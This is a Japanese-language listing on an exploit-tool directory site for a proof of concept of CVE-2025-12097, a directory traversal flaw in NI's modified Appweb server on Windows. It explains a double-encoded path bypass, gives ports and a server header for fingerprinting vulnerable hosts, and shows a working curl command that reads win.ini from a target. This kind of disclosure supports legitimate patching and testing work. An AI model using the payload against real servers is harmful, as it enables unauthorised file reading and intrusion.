Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2025-12097 — CVE-2025-12097の概念実証エクスプロイト。NI-modified Appwebサーバーにおけるディレクトリトラバーサルの脆弱性で、Windowsシステム上で任意のファイル読み取りを可能にします。 | Kitploit
ツール/GitHubGitHub/matejsmycka/poc-cve-2025-12097
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubmatejsmycka/poc-cve-2025-12097

PoC-CVE-2025-12097

CVE-2025-12097の概念実証エクスプロイト。NI-modified Appwebサーバーにおけるディレクトリトラバーサルの脆弱性で、Windowsシステム上で任意のファイル読み取りを可能にします。

リポジトリを見る
19ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-12097

説明

NI による Appweb サーバーの改変には、攻撃者がサーバー上の任意のファイルを読み取ることを可能にするディレクトリトラバーサルの脆弱性が含まれています。

URI パス /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini は次のように変換されます。

pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 これは有効な URI であり、appweb はこのリクエストをブロックしません。その後、カスタムハンドラーに渡され、この場合リクエストされたファイルの内容が返されます。

影響を受けるソフトウェアの性質上、影響を受けるデバイスは専ら Microsoft Windows システムです。

確認された最も高い脆弱性バージョン: 12.0.0。

脆弱なデバイスの識別

影響を受けるデバイスは、以下の特徴によって識別できます。

常に存在するわけではありませんが、ほとんどの場合、サービスはポート 3580 で動作しています。その他のポートには 8080 や 80 が含まれる場合があります。

/ へのサーバー応答

root@kitploit:~
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>

PoC

この脆弱性を悪用するには、次のコマンドを使用します。

root@kitploit:~
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini

ターゲットが脆弱な場合、win.ini ファイルの内容が表示されます。

ツールをダウンロード